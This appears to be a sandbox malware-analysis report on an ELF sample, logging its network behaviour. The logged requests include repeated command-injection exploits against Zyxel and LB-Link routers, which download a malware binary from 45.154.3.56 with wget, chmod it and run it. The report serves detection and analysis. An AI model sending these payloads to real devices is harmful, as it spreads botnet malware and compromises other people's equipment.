Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
Source: unknownDNS traffic detected: queries for: a.iruko.top
Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 34 2e 33 2e 35 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.154.3.56/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Tue, 12 Mar 2024 08:40:32 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0X-NWS-LOG-UUID: 12335642991120322983Connection: closeServer: Lego ServerDate: Tue, 12 Mar 2024 07:51:32 GMTX-Cache-Lookup: Return Directly
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cacheConnection: closePragma: no-cacheContent-Length: 8Content-Type: text/htmlAccept-Ranges: bytesAccess-Control-Expose-Headers: WWW-AuthenticateAccess-Control-Allow-Credentials: true
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: HH5LnBFw1p.elfString found in binary or memory: http://45.154.3.56/mips;$
Source: HH5LnBFw1p.elfString found in binary or memory: http://45.154.3.56/mpsl;
Source: unknownNetwork traffic detected: HTTP traffic on port 39890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59024 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40408 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 48366 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 48378 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37238 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 35070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59494 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 38564 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 32800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58144 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39500
Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59470 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
Source: unknownNetwork traffic detected: HTTP traffic on port 47004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
Source: unknownNetwork traffic detected: HTTP traffic on port 52898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 46148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51500 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52428 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52516
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
Source: unknownNetwork traffic detected: HTTP traffic on port 35478 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 47462 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52518
Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39540
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39542
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52512
Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39544
Source: unknownNetwork traffic detected: HTTP traffic on port 39468 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52510
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39546
Source: unknownNetwork traffic detected: HTTP traffic on port 48558 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39538
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40524
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40528
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
Source: unknownNetwork traffic detected: HTTP traffic on port 44820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40522
Source: unknownNetwork traffic detected: HTTP traffic on port 57264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40520
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52528
Source: unknownNetwork traffic detected: HTTP traffic on port 57276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52526
Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 40830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39530
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39532
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39534
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52524
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39536
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52522
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
Source: unknownNetwork traffic detected: HTTP traffic on port 58590 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40516
Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39526
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40514
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40518
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40512
Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40510
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52538
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
Source: unknownNetwork traffic detected: HTTP traffic on port 47474 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
Source: unknownNetwork traffic detected: HTTP traffic on port 45268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52534
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39522
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52532
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39524
Source: unknownNetwork traffic detected: HTTP traffic on port 57252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39516
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40504
Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39518
